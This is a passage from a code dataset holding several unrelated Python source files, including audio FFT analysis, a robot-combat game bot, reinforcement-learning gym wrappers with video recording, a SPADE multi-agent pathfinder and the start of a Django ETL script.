aprox_to_notes (arr) :\n with open(\"assets/notes.json\") as jsonf : \n note_dict : dict = json.load(jsonf)[\"inverse_note_freqs\"]\n notes = np.array(list((note_dict.keys())),dtype=float)\n aproxs = [notes[np.argmin(np.abs(notes - num))] for num in arr]\n return aproxs\n\nclass Param_generator () : \n def __init__ (self) : \n self.param_layout = self.load_param_layout()\n \n def load_param_layout (self) :\n with open(\"assets/notes.json\") as jsonf : \n param_layout = json.load(jsonf)[\"inverse_note_freqs\"]\n for key in param_layout : \n param_layout[key] = 0\n \n return param_layout\n \n def get_freq_param_set (self,sample_set : list,print_progress=True,return_max_sample_amps = False) :\n \n if print_progress == True :\n sample_set = tqdm(sample_set) \n \n result_params = []\n max_sample_amps = []\n \n for signal,fs in sample_set : \n #obtener amplitud maxima del fragmento de audio\n if return_max_sample_amps : \n max_amp = np.max(np.abs(signal))\n max_sample_amps.append(max_amp)\n \n np.set_printoptions(suppress=True)\n spec = np.fft.fft(signal)\n freqs = np.abs(np.fft.fftfreq(len(spec), 1/fs))\n mags = np.abs(spec)\n \n half_len = int(len(freqs) // 2)\n \n #frecuencias\n freqs = freqs[:half_len]\n aprox_freqs = np.array(aprox_to_notes(freqs))\n #magnituddes\n mags = np.array(mags[:half_len])\n max_mag = np.max(mags)\n round_mags = np.round(np.divide(mags,max_mag),4)\n \n #sumar magnitud de duplicados en una malla de frecuencias\n stacks = np.column_stack((aprox_freqs,round_mags))\n unique_stacks = np.unique(stacks,axis=0)\n\n unprocessed_param_mesh : dict = dict(self.param_layout)\n for freq,mag in unique_stacks : \n if mag > 0 and mag < 4200 :\n unprocessed_param_mesh[str(freq)] += mag\n \n #formatear y normalizar resultados\n freqs = np.array(list(unprocessed_param_mesh.keys()),dtype=np.float32)\n mags = np.array(list((unprocessed_param_mesh.values())),dtype=np.float32)\n max_mag = np.max(mags)\n norm_mags = np.round(np.divide(mags,max_mag),4)\n processed_param_mesh = np.column_stack((freqs,norm_mags))\n \n result_params.append(processed_param_mesh)\n \n result_params = np.array(result_params,dtype=np.float32)\n \n if return_max_sample_amps == True : \n return result_params,max_sample_amps\n \n if return_max_sample_amps == False :\n return result_params\n \n \n\n\n \n \n\n \n\n \n \n \n\n \n \n \n \n \n \n\n \n \n ","repo_name":"radras44/Music_analyzer","sub_path":"utils/audio_utils.py","file_name":"audio_utils.py","file_ext":"py","file_size_in_byte":7879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4883814920","text":"import matplotlib.pyplot as plt\r\nfrom mpl_toolkits.basemap import Basemap\r\n\r\n\r\ndef Draw_Magnetic_Field(Latitude, Longitude, Variable, name: str, year: int = 2005) -> None:\r\n fig = plt.figure()\r\n m = Basemap()\r\n m.drawcoastlines()\r\n plt.contourf(Latitude * 2.0, Longitude, Variable)\r\n plt.savefig(f'{name} in year {year}.eps', format='eps')\r\n","repo_name":"ChandlerXij/Homework1_Python_and_Deep_Learning_Basics","sub_path":"Draw.py","file_name":"Draw.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"46524993286","text":"import pygame\nfrom automated_robot import AutomatedRobot\nfrom numpy import random\nimport numpy as np\n\nclass Wefoh(AutomatedRobot):\n\n def __init__(self, x, y, turn_left=False, **kwargs):\n kwargs[\"image_path\"] = \"Resources/wefoh.jpeg\"\n AutomatedRobot.__init__(self, x, y, turn_left, **kwargs)\n\n def decide(self, other_robot_properties, coins, projectiles):\n \"\"\"\"Returns a projectile object or None.\"\"\"\n\n self.other_robot_properties = other_robot_properties\n\n # Randomly decide what to upgrade\n if self.projectile_initial_speed < 5:\n self.upgrade_stat(self.stat_keys[1])\n elif self.self_speed < 5:\n self.upgrade_stat(self.stat_keys[3])\n elif self.armor < 200:\n self.upgrade_stat(self.stat_keys[4])\n else:\n self.upgrade_stat(self.stat_keys[2])\n\n move_vector, enemy_coin, distance_to_coin = self.check_coins(coins)\n\n # Randomly decide where to move\n for projectile in projectiles:\n if projectile.pos[0] > (self.pos[0] + self.width) and projectile.velocity[0] > 0:\n continue\n elif projectile.pos[0] < self.pos[0] and projectile.velocity[0] < 0:\n continue\n\n distance_vector = self.pos - projectile.pos\n distance = np.sqrt(distance_vector[0]**2 + distance_vector[1]**2)\n\n p_speed = np.sqrt(projectile.velocity[0]**2 + projectile.velocity[1]**2)\n\n if 150 > abs(distance) + 5*p_speed - self.max_self_speed*5: \n move_vector = [projectile.velocity[0], projectile.velocity[1]]\n \n if self.pos[0] > 1000:\n move_vector[0] = -abs(move_vector[0])\n elif self.pos[0] < 50:\n move_vector[0] = abs(move_vector[0])\n \n if self.pos[1] > 700:\n move_vector[1] = -abs(move_vector[1])\n elif self.pos[1] < 50:\n move_vector[1] = abs(move_vector[1])\n\n vx,vy = move_vector[0], -move_vector[1]\n\n self.set_velocity(vy=vy,vx=vx)\n \n # Decide to cast a basic attack\n enemy_pos = other_robot_properties[\"pos\"]\n enemy_pos[0] = enemy_pos[0] + self.width/2\n enemy_pos[1] = enemy_pos[1] + self.height/2\n distance_to_enemy = self.pos - enemy_pos\n\n distance_to_enemy = np.sqrt(distance_to_enemy[0]**2 + distance_to_enemy[1]**2)\n\n distance_enemy_to_coin = enemy_pos - enemy_coin\n distance_enemy_to_coin = np.sqrt(distance_enemy_to_coin[0]**2 + distance_enemy_to_coin[1]**2)\n\n if distance_to_coin > distance_to_enemy:\n bullet = self.cast_basic_attack(enemy_pos)\n elif distance_to_enemy < distance_enemy_to_coin:\n bullet = self.cast_basic_attack(enemy_pos)\n else:\n bullet = self.cast_basic_attack(enemy_coin)\n\n return bullet\n\n def check_coins(self, coins):\n min_dist = 100000\n enemy_min_dist = 100000\n move_vector = np.zeros((2,), dtype=int)\n pos = [self.pos[0] + self.width/2, self.pos[1] + self.height/2]\n enemy_coin_pos = [0,0]\n distance = 100000\n\n for coin in coins:\n distance_vector = coin.pos - pos\n enemy_distance_vector = coin.pos - self.other_robot_properties[\"pos\"]\n \n distance = np.sqrt(distance_vector[0]**2 + distance_vector[1]**2)\n enemy_distance = np.sqrt(enemy_distance_vector[0]**2 + enemy_distance_vector[1]**2)\n \n if enemy_distance < enemy_min_dist:\n enemy_min_dist = enemy_distance\n enemy_coin_pos = coin.pos\n\n if enemy_distance < distance:\n continue\n\n if distance < min_dist:\n min_dist = distance\n move_vector = distance_vector\n\n return move_vector, enemy_coin_pos, distance","repo_name":"zimatek/RobotCombat","sub_path":"automated_robots/robots_concursantes/wefoh.py","file_name":"wefoh.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72000477949","text":"import builtins\nimport base64\nimport datetime\nimport io\nimport os\nimport random\nimport copy\nimport numpy as np\nimport shutil\nimport cv2\nfrom typing import Optional\nimport subprocess\nfrom unittest.mock import patch\nfrom collections import deque\nfrom typing import Optional\nfrom IPython import display\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\n\nimport gym\nfrom gym import Wrapper\nfrom gym import spaces\nfrom gym.spaces import Box\nfrom gym.wrappers import Monitor as _monitor\nfrom gym.wrappers import LazyFrames\nfrom matplotlib import animation\nfrom pyvirtualdisplay import Display\nfrom trident.context import split_path, make_dir_if_need, sanitize_path\n\nfrom trident.backend.common import get_plateform, get_time_suffix, \\\n OrderedDict\nfrom trident.misc.ipython_utils import *\nfrom trident.reinforcement.utils import ObservationType, ActionStrategy\nfrom trident import context\nfrom trident.data.vision_transforms import Resize\nfrom trident.backend.pillow_backend import array2image, image2array\n\nctx = context._context()\n__all__ = ['NoopResetEnv', 'EpisodicLifeEnv', 'MaxAndSkipEnv', 'RunningAvgAndSkipEnv', 'WarpFrame', 'FrameStack',\n 'TimeAwareObservation', 'VideoRecording']\n\n\nclass NoopResetEnv(gym.Wrapper):\n def __init__(self, env, noop_max=30, preferred_actions=None):\n \"\"\"Sample initial states by taking random number of no-ops on reset.\n No-op is assumed to be action 0.\n \"\"\"\n gym.Wrapper.__init__(self, env)\n self.noop_max = noop_max\n self.override_num_noops = None\n self.noop_action = 0\n self.preferred_actions = preferred_actions\n # assert env.unwrapped.get_action_meanings()[0] == 'NOOP'\n\n def reset(self, **kwargs):\n \"\"\" Do no-op action for a number of steps in [1, noop_max].\"\"\"\n self.env.reset(**kwargs)\n\n if self.override_num_noops is not None:\n noops = self.override_num_noops\n else:\n noops = self.unwrapped.np_random.randint(1, self.noop_max + 1)\n assert noops > 0\n\n obs = None\n remain_noops = noops\n while remain_noops > 0:\n if random.random() < 0.8:\n if isinstance(self.preferred_actions, list) and len(self.preferred_actions) > 0:\n obs, _, done, _ = self.env.step(random.choice(self.preferred_actions))\n else:\n obs, _, done, _ = self.env.step(self.noop_action)\n remain_noops -= 1\n if done:\n obs = self.env.reset(**kwargs)\n return obs\n\n\nclass EpisodicLifeEnv(gym.Wrapper):\n def __init__(self, env):\n \"\"\"Make end-of-life == end-of-episode, but only reset on true game over.\n Done by DeepMind for the DQN and co. since it helps value estimation.\n \"\"\"\n gym.Wrapper.__init__(self, env)\n self.lives = self.env.unwrapped._life\n self.was_real_done = True\n\n def step(self, action):\n obs, reward, done, info = self.env.step(action)\n self.was_real_done = done\n # check current lives, make loss of life terminal,\n # then update lives to handle bonus lives\n lives = self.env.unwrapped._life\n # lives = self.env.unwrapped.ale.lives()\n if self.lives > lives > 0:\n # for Qbert sometimes we stay in lives == 0 condition for a few frames\n # ,so it's important to keep lives > 0, so that we only reset once\n # the environment advertises done.\n done = True\n self.lives = lives\n return obs, reward, done, info\n\n def reset(self, **kwargs):\n \"\"\"Reset only when lives are exhausted.\n This way all states are still reachable even though lives are episodic,\n and the learner need not know about any of this behind-the-scenes.\n \"\"\"\n if self.was_real_done:\n obs = self.env.reset(**kwargs)\n\n else:\n # no-op step to advance from terminal/lost life state\n obs, _, _, _ = self.env.step(0)\n\n # self.lives = self.env.unwrapped.ale.lives()\n self.lives = self.env.unwrapped._life\n return obs\n\n\nclass MaxAndSkipEnv(gym.Wrapper):\n def __init__(self, env, skip=4):\n \"\"\"Return only every `skip`-th frame\"\"\"\n gym.Wrapper.__init__(self, env)\n # most recent raw observations (for max pooling across time steps)\n self._obs_buffer = np.zeros((2,) + env.observation_space.shape, dtype=np.uint8)\n self._skip = skip\n\n def step(self, action):\n \"\"\"Repeat action, sum reward, and max over last observations.\"\"\"\n total_reward = 0.0\n done = None\n info = None\n for i in range(self._skip):\n obs, reward, done, info = self.env.step(action)\n if i == self._skip - 2: self._obs_buffer[0] = obs\n if i == self._skip - 1: self._obs_buffer[1] = obs\n total_reward += reward\n if done:\n break\n # Note that the observation on the done=True frame\n # doesn't matter\n max_frame = self._obs_buffer.max(axis=0)\n\n return max_frame, total_reward, done, info\n\n def reset(self, **kwargs):\n return self.env.reset(**kwargs)\n\n\nclass RunningAvgAndSkipEnv(gym.Wrapper):\n def __init__(self, env, skip=4):\n \"\"\"Return only every `skip`-th frame\"\"\"\n gym.Wrapper.__init__(self, env)\n # most recent raw observations (for max pooling across time steps)\n self._obs_buffer = np.zeros((skip,) + env.observation_space.shape, dtype=np.uint8)\n self._skip = skip\n\n def step(self, action):\n \"\"\"Repeat action, sum reward, and max over last observations.\"\"\"\n total_reward = 0.0\n done = None\n info = None\n for i in range(self._skip):\n obs, reward, done, info = self.env.step(action)\n\n self._obs_buffer[i] = obs\n\n total_reward += reward\n if done or self.env.unwrapped._is_dying or self.env.unwrapped._is_dead or self.env.unwrapped._life < 2:\n done = True\n break\n # Note that the observation on the done=True frame\n # doesn't matter\n weight = np.reshape(np.array([1, 2, 3, 4]), (4, 1, 1, 1))\n max_frame = (weight * self._obs_buffer).sum(axis=0) / 10.0\n\n return max_frame, total_reward, done, info\n\n def reset(self, **kwargs):\n return self.env.reset(**kwargs)\n\n\nclass WarpFrame(gym.ObservationWrapper):\n def __init__(self, env, width=84, height=84, grayscale=True, dict_space_key=None):\n \"\"\"\n Warp frames to 84x84 as done in the Nature paper and later work.\n\n If the environment uses dictionary observations, `dict_space_key` can be specified which indicates which\n observation should be warped.\n \"\"\"\n super().__init__(env)\n self._width = width\n self._height = height\n self._grayscale = grayscale\n self._key = dict_space_key\n if self._grayscale:\n num_colors = 1\n else:\n num_colors = 3\n\n new_space = gym.spaces.Box(\n low=0,\n high=255,\n shape=(self._height, self._width, num_colors),\n dtype=np.uint8,\n )\n if self._key is None:\n original_space = self.observation_space\n self.observation_space = new_space\n else:\n original_space = self.observation_space.spaces[self._key]\n self.observation_space.spaces[self._key] = new_space\n assert original_space.dtype == np.uint8 and len(original_space.shape) == 3\n\n def observation(self, obs):\n if self._key is None:\n frame = obs\n else:\n frame = obs[self._key]\n\n if self._grayscale:\n frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\n frame = cv2.resize(frame[34:194], (self._width, self._height), interpolation=cv2.INTER_AREA)\n if self._grayscale:\n frame = np.expand_dims(frame, -1)\n\n if self._key is None:\n obs = frame\n else:\n obs = obs.copy()\n obs[self._key] = frame\n return obs\n\n\nclass FrameStack(gym.Wrapper):\n def __init__(self, env, k):\n \"\"\"Stack k last frames.\n\n Returns lazy array, which is much more memory efficient.\n\n See Also\n --------\n baselines.common.atari_wrappers.LazyFrames\n \"\"\"\n gym.Wrapper.__init__(self, env)\n self.k = k\n self.frames = deque([], maxlen=k)\n shp = env.observation_space.shape\n self.observation_space = spaces.Box(low=0, high=255, shape=(shp[:-1] + (shp[-1] * k,)),\n dtype=env.observation_space.dtype)\n\n def reset(self):\n ob = self.env.reset()\n for _ in range(self.k):\n self.frames.append(ob)\n return self._get_ob()\n\n def step(self, action):\n ob, reward, done, info = self.env.step(action)\n self.frames.append(ob)\n return self._get_ob(), reward, done, info\n\n def _get_ob(self):\n assert len(self.frames) == self.k\n return LazyFrames(list(self.frames))\n\n\nclass TimeAwareObservation(gym.ObservationWrapper):\n \"\"\"Augment the observation with current time step in the trajectory.\n Currently, it only works with one-dimensional observation space.\n It doesn't support pixel observation space yet.\n \"\"\"\n\n def __init__(self, env, max_time=None):\n super(TimeAwareObservation, self).__init__(env)\n self.stay_fool = False\n if max_time is None:\n self.max_time = env.unwrapped._time_last\n else:\n self.max_time = max_time\n\n if isinstance(env.observation_space, Box) and ((\n env.observation_space.low.max() == 0 and env.observation_space.high.min() == 255) and env.observation_space.dtype in [\n np.uint8, np.float32]):\n self.obsetvation_type = ObservationType.Image\n elif isinstance(env.observation_space, Box) and env.observation_space.dtype == np.float32:\n low = np.append(self.observation_space.low, 0.0)\n high = np.append(self.observation_space.high, np.inf)\n self.observation_space = Box(low, high, dtype=np.float32)\n self.obsetvation_type = ObservationType.Box\n\n def observation(self, observation):\n\n if self.obsetvation_type == ObservationType.Box:\n return np.append(observation,\n self.t if self.max_time is None or self.max_time == 0 else self.t / float(self.max_time))\n elif self.obsetvation_type == ObservationType.Image and self.max_time > 0:\n ratio = 0\n if hasattr(super(TimeAwareObservation, self).unwrapped, '_time'):\n ratio = (self.max_time - super(TimeAwareObservation, self).unwrapped._time) / float(self.max_time)\n original_dtype = observation.dtype\n pixels = builtins.round(self.observation_space.shape[1] * ratio)\n\n H, W, C = observation.shape\n _observation = observation.copy().astype(np.float32)\n obj_base = np.zeros((W, W, C)).astype(np.float32)\n obj_base[:H, :, :] = _observation\n if self.stay_fool or ratio > 0.5:\n noise_mask = np.ones((1, W, 1))\n noise_mask[:, :W // 4, :] = np.expand_dims(np.expand_dims(np.linspace(0.2, 1, W // 4), 0), -1).astype(\n np.float32)\n noise_mask = np.concatenate([noise_mask, noise_mask, noise_mask], axis=-1)\n obj_base = np.clip(\n obj_base * noise_mask + (1 - noise_mask) * (80 * np.random.standard_normal((W, W, C))), 0, 255)\n\n if len(self.observation_space.shape) == 2:\n obj_base[-5:, :pixels] = 0\n obj_base[-5:, pixels:] = 255\n elif len(self.observation_space.shape) == 3:\n obj_base[-5:, :pixels, :] = 0\n if self.stay_fool:\n obj_base[-5:, pixels:, :] = 255\n obj_base[-5:, pixels:, 1:] = 0\n else:\n obj_base[-5:, pixels:, :] = 255\n return np.clip(obj_base, 0, 255).astype(original_dtype)\n\n def step(self, action):\n observation, reward, done, info = self.env.step(action)\n if 'stay_fool' in info:\n self.stay_fool = info['stay_fool']\n time_awareness_obj = self.observation(observation)\n return time_awareness_obj, reward, done, info\n\n def reset(self, **kwargs):\n self.t = 0\n return self.env.reset(**kwargs)\n\n # def render(self, mode='human', **kwargs):\n # if mode=='human':\n # return super(TimeAwareObservation, self).render(mode, **kwargs)\n # elif mode == 'observation':\n # return self.observation(super(TimeAwareObservation, self).render('rgb_array').copy())\n # elif mode=='rgb_array':\n # return super(TimeAwareObservation, self).render('rgb_array')\n\n\nclass _VirtualDisplaySingleton(object):\n def __new__(cls, *args, **kwargs):\n if not hasattr(cls, \"_instance\"):\n cls._instance = super().__new__(cls)\n return cls._instance\n\n def __init__(self, size=(1024, 768)):\n self.size = size\n\n if not hasattr(self, \"_display\"):\n self._display = Display(visible=0, size=self.size)\n original = subprocess.Popen\n\n def Popen(cmd, pass_fds, stdout, stderr, shell):\n return original(cmd, pass_fds=pass_fds,\n stdout=stdout, stderr=stderr,\n shell=shell, preexec_fn=os.setpgrp)\n\n with patch(\"subprocess.Popen\", Popen):\n self._display.start()\n\n def _restart_display(self):\n self._display.stop()\n self._display.start()\n\n\nclass VirtualDisplay(Wrapper):\n \"\"\"\n Wrapper for running Xvfb\n \"\"\"\n\n def __init__(self, env, size=(1024, 768)):\n \"\"\"\n Wrapping environment and start Xvfb\n \"\"\"\n super().__init__(env)\n self.size = size\n self._display = _VirtualDisplaySingleton(size)\n\n def render(self, mode=None, **kwargs):\n \"\"\"\n Render environment\n \"\"\"\n return self.env.render(mode='rgb_array', **kwargs)\n\n\nclass VideoRecording(gym.Wrapper):\n \"\"\"\n Monitor wrapper to store images as videos.\n\n This class is a shin wrapper for `gym.wrappers.Monitor`. This class also\n have a method `display`, which shows recorded movies on Notebook.\n\n See Also\n --------\n gym.wrappers.Monitor : https://github.com/openai/gym/blob/master/gym/wrappers/monitor.py\n \"\"\"\n\n def __init__(self, env, directory: Optional[str] = None, enabled=False, fps=None, min_frames=None,\n done_then_finish=True, name_prefix=None, **kwargs):\n \"\"\"\n Initialize Monitor class\n\n Parameters\n ----------\n directory : str, optional\n Directory to store output movies. When the value is `None`,\n which is default, \"%Y%m%d-%H%M%S\" is used for directory.\n \"\"\"\n gym.Wrapper.__init__(self, env)\n self._recording_enabled = enabled\n self._is_recording = False\n self.num_frames = 0\n self.directory = directory\n self.done_then_finish = done_then_finish\n self.video_tags = OrderedDict()\n if directory is None:\n self.directory = make_dir_if_need('videos')\n else:\n self.directory = make_dir_if_need(sanitize_path(directory))\n self.fps = fps\n if 'video.frames_per_second' not in self.env.metadata:\n self.env.metadata['video.frames_per_second'] = self.fps if self.fps is not None else 30\n self.min_frames = min_frames\n self.videos = []\n self._display = None\n shp = env.observation_space.shape\n if get_plateform() != 'windows':\n self._display = _VirtualDisplaySingleton((shp[1], shp[0]))\n if name_prefix is None:\n name_prefix = 'video'\n\n self.name_prefix = name_prefix\n self.current_recording_path = None\n self.vw = None\n # self.resize = Resize((84, 84), keep_aspect=True)\n # self.vw2 = None\n self.frame_steps = 0\n self.prev_screen = None\n self.current_screen = None\n self.prev_observation = None\n self.current_observation = None\n self.prev_reward = 0\n self.prev_done = False\n self.info = None\n self.frame_stats = []\n\n def create_video_writer(self):\n shp = (240, 240, 3) # super().render(mode='rgb_array').shape\n video_name = os.path.join(self.directory, self.name_prefix + '_' + get_time_suffix() + '.avi')\n # video_name2 = os.path.join(self.directory, self.name_prefix + '_obj_' + get_time_suffix() + '.avi')\n self.current_recording_path = video_name\n # self.current_recording_path2 = video_name2\n\n self.vw = cv2.VideoWriter(video_name, cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'),\n if_none(self.fps, self.env.metadata['video.frames_per_second']), (shp[1], shp[0]))\n self.video_tags = OrderedDict()\n\n # self.vw2 = cv2.VideoWriter(video_name2, cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), self.env.metadata['video.frames_per_second'], (84*4, 84*4))\n\n self._is_recording = True\n self.frame_steps = 0\n\n def close_video_recorder(self):\n\n if self._is_recording and (self.vw is not None and self.frame_steps > 0):\n self.vw.release()\n self.vw = None\n # self.vw2.release()\n self._is_recording = False\n\n if 'keep' in self.video_tags and self.video_tags['keep']:\n if 'name_suffix' in self.video_tags:\n folder, filename, ext = split_path(self.current_recording_path)\n os.rename(self.current_recording_path,\n os.path.join(folder, filename + '_' + self.video_tags['name_suffix'] + ext))\n self.videos.append(self.current_recording_path)\n elif 'keep' in self.video_tags and not self.video_tags['keep']:\n os.remove(self.current_recording_path)\n elif (self.min_frames is not None and self.frame_steps < self.min_frames):\n os.remove(self.current_recording_path)\n # os.remove(self.current_recording_path2 )\n else:\n self.videos.append(self.current_recording_path)\n\n def step(self, action):\n \"\"\"\n Step Environment\n \"\"\"\n\n try:\n\n observation, reward, done, info = self.env.step(action)\n\n self.done = done\n\n new_render = self.render('rgb_array').copy()\n\n self.prev_screen = copy.deepcopy(self.current_screen)\n self.current_screen = new_render\n self.prev_observation = copy.deepcopy(self.current_observation)\n self.current_observation = observation.copy()\n\n if self.current_observation.shape != self.prev_observation.shape:\n self.prev_observation = self.current_observation.copy()\n\n if self.vw is None:\n self.create_video_writer()\n\n # if self.done_then_finish and self.done:\n # self.close_video_recorder()\n\n else:\n if self._recording_enabled and self._is_recording:\n self.vw.write(cv2.cvtColor(self.current_observation, cv2.COLOR_RGB2BGR))\n self.frame_steps += 1\n self.env.unwrapped.frame_steps = self.frame_steps\n # obj_frame= cv2.resize(cv2.cvtColor(observation.copy().copy(), cv2.COLOR_RGB2BGR),(84*4,84*4),cv2.INTER_LANCZOS4)\n # self.vw2.write(obj_frame)\n\n self.prev_reward = reward\n self.prev_done = done\n self.info = info\n\n self.state = observation\n return self.state.copy(), reward, done, info\n except KeyboardInterrupt as k:\n self.close_video_recorder()\n raise\n\n def reset(self, **kwargs):\n \"\"\"\n Reset Environment\n \"\"\"\n try:\n\n if self.done_then_finish and self._is_recording and self.frame_steps > 0:\n self.close_video_recorder()\n if self._recording_enabled and (not self._is_recording or self.vw is None):\n self.create_video_writer()\n\n self.frame_stats = []\n self.prev_reward = 0\n self.prev_done = False\n self.info = None\n self.frame_steps = 0\n self.env.unwrapped.frame_steps = self.frame_steps\n observation = self.env.reset()\n\n self.prev_observation = observation\n self.current_observation = observation\n self.state = observation\n\n return self.state\n except KeyboardInterrupt:\n self.close_video_recorder()\n raise\n\n def display(self, reset: bool = False):\n \"\"\"\n Display saved all movies\n\n If video is running, stop and flush the current video then display all.\n\n Parameters\n ----------\n reset : bool, optional\n When `True`, clear current video list. This does not delete movie files.\n The default value is `False`, which keeps video list.\n \"\"\"\n\n # Close current video.\n self._close_running_video()\n if is_in_ipython():\n for f in self.videos:\n if not os.path.exists(f):\n continue\n\n video = io.open(f[0], \"r+b\").read()\n encoded = base64.b64encode(video)\n\n display.display(os.path.basename(f))\n display.display(display.HTML(data=\"\"\"\n \n \"\"\".format(encoded.decode('ascii'))))\n\n if reset:\n self.videos = []\n","repo_name":"AllanYiin/trident","sub_path":"trident/reinforcement/envs/wrappers.py","file_name":"wrappers.py","file_ext":"py","file_size_in_byte":22162,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"6"} +{"seq_id":"19351032994","text":"from __future__ import print_function\nimport spade\n\nfrom map.map import Map\nfrom astar.astar import Astar\nfrom util import backtrace\n\nclass PathFinder(spade.Agent.Agent):\n \"\"\"Agent that finds best path\"\"\"\n is_setup = False\n\n\n class RequestInformationBehaviour(spade.Behaviour.PeriodicBehaviour):\n astar = Astar()\n\n @backtrace\n def _onTick(self):\n msg = self._receive(False)\n while msg:\n data = None\n content = eval(msg.getContent())\n\n if 'map' not in content.keys():\n path = self.superpath(content['location'], content['open'])\n else:\n try:\n path = self.motherpath(content['map'], content['location'],\n content['open'])\n except:\n print(self.myAgent.name, \"error with\", content)\n raise\n\n rep = msg.createReply()\n if self.myAgent.sv:\n rep.setOntology(content['ontology'])\n else:\n rep.setPerformative(\"inform\")\n rep.setContent(\"route {}\".format(path))\n self.myAgent.send(rep)\n #print(self.myAgent.name, \"path done\", path)\n msg = self._receive(False)\n\n def motherpath(self, map, location, open):\n if len(open) == 0:\n open = [(1, 1)]\n path = self.astar.getPath(map, location, open[0])\n for goal in open:\n tempPath = self.astar.getPath(map, location, goal)\n if len(tempPath) > 0:\n if len(tempPath) < len(path):\n path = tempPath\n\n if len(path) == 0:\n path = self.astar.getPath(map, location, (1, 1))\n return path\n\n def superpath(self, location, open):\n return self.motherpath(self.myAgent.map, location, open)\n\n\n class DatabaseMapUpdates(spade.Behaviour.PeriodicBehaviour):\n @backtrace\n def _onTick(self):\n msg = self._receive(False)\n if msg:\n content = msg.getContent().split(' ', 1)\n if content[0] == \"map\":\n self.myAgent.map = content[1]\n self.myAgent.sendMapUpdateRequest()\n\n\n class RegisterServicesBehav(spade.Behaviour.OneShotBehaviour):\n def _process(self):\n dad = spade.DF.DfAgentDescription()\n sd = spade.DF.ServiceDescription()\n sd.setType(\"pathfinder\")\n sd.setName(\"standalone\")\n dad.addService(sd)\n\n dad.setAID(self.myAgent.getAID())\n res = self.myAgent.registerService(dad)\n print(self.myAgent.name, \"services registred:\", res)\n\n\n class SupervisorDetection(spade.Behaviour.PeriodicBehaviour):\n def onStart(self):\n print(self.myAgent.name, \"Looking for supervisor\")\n self.counter = 0\n\n @backtrace\n def _process(self):\n sd = spade.DF.ServiceDescription()\n sd.setType(\"supervisor\")\n dad = spade.DF.DfAgentDescription()\n dad.addService(sd)\n\n result = self.myAgent.searchService(dad)\n if len(result):\n self.myAgent.sv = True\n\n if self.counter > 50 or self.myAgent.sv:\n self.myAgent.removeBehaviour(self)\n if self.counter > 50:\n self.myAgent.removeBehaviour(self.myAgent.mapbehav)\n self.counter = self.counter + 1\n\n\n def _setup(self):\n print(\"Starting PathFinderAgent {}...\".format(self.name))\n\n self.sv = False\n self.map = []\n\n self.addBehaviour(self.RegisterServicesBehav(), None)\n\n replyTemp = spade.Behaviour.ACLTemplate()\n replyTemp.setPerformative(\"request\")\n replyTemp.setOntology(\"map\")\n temp = spade.Behaviour.MessageTemplate(replyTemp)\n\n rb = self.RequestInformationBehaviour(.1)\n self.addBehaviour(rb, temp)\n\n sb = self.SupervisorDetection(.1)\n self.addBehaviour(sb, None)\n\n dbTemp = spade.Behaviour.ACLTemplate()\n dbTemp.setPerformative(\"inform\")\n temp = spade.Behaviour.MessageTemplate(dbTemp)\n self.mapbehav = self.DatabaseMapUpdates(.1)\n self.addBehaviour(self.mapbehav, temp)\n self.sendMapUpdateRequest()\n\n self.is_setup = True\n\n def takeDown(self):\n print(\"Stopping PathFinder agent {}...\".format(self.name))\n\n def sendMapUpdateRequest(self):\n msg = spade.ACLMessage.ACLMessage()\n msg.setPerformative(msg.REQUEST)\n msg.addReceiver(spade.AID.aid(\"db@127.0.0.1\", [\"xmpp://db@127.0.0.1\"]))\n msg.setContent(\"MAP\")\n self.send(msg)\n\n\ndef main():\n import time\n import traceback\n pf = PathFinder(\"path@127.0.0.1\", \"secret\")\n pf.start()\n\n try:\n while 1: time.sleep(1)\n except KeyboardInterrupt:\n pass\n except:\n print(traceback.format_exc())\n\n pf.stop()\n\nif __name__ == '__main__':\n main()\n","repo_name":"XeryusTC/dmas","sub_path":"agents/pathfinder.py","file_name":"pathfinder.py","file_ext":"py","file_size_in_byte":5118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24287575783","text":"class ListNode:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n def to_list(self):\n result = []\n current = self\n while current:\n result.append(current.value)\n current = current.next\n return result\n\n\ndef rotate_linked_list(head):\n if not head:\n return None\n current = head\n new_head = current.next\n n = new_head.next\n new_head.next = current\n current.next = rotate_linked_list(n)\n\n return new_head\n\n\ndef main():\n head = ListNode(1)\n head.next = ListNode(2)\n head.next.next = ListNode(3)\n head.next.next.next = ListNode(4)\n assert rotate_linked_list(head).to_list() == [2, 1, 4, 3]\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ckallum/Daily-Coding-Problem","sub_path":"solutions/#145.py","file_name":"#145.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8582685925","text":"import datetime\nimport os\n\nimport django\n\nos.environ['DJANGO_SETTINGS_MODULE'] = 'spec_dc.settings'\ndjango.setup()\n\nfrom dim.models import DimSuite, DimDate, DimCpu, DimVendor, DimSystem, DimSystemSeries\nfrom dwd.models import DwdTestInfo, DwdSubmitInfo\nfrom ods.models import OdsSpecModel\n\n\nclass BuildDimDwd:\n\n def run(self):\n self._solve()\n\n def _solve(self):\n query_set = OdsSpecModel.objects.all()\n idx = 1\n total_num = len(query_set)\n for spec_model in query_set.iterator():\n self._build_dim(spec_model)\n if idx % 50 == 0:\n print(f\"Status: {idx} / {total_num}\")\n idx += 1\n\n def _build_dim(self, spec_model: OdsSpecModel):\n suite = self._process_suite(spec_model.suite)\n test_date = self._process_date(spec_model.test_date)\n hw_avail = self._process_date(spec_model.hw_avail)\n cpu = self._process_cpu(\n spec_model.cpu_vendor, spec_model.cpu_name, spec_model.cpu_ghz,\n spec_model.max_ghz, spec_model.cores_per_chip, spec_model.threads_per_core,\n )\n vendor = self._process_vendor(spec_model.hw_vendor)\n system_series = self._process_system_series(spec_model.system_series)\n system_name 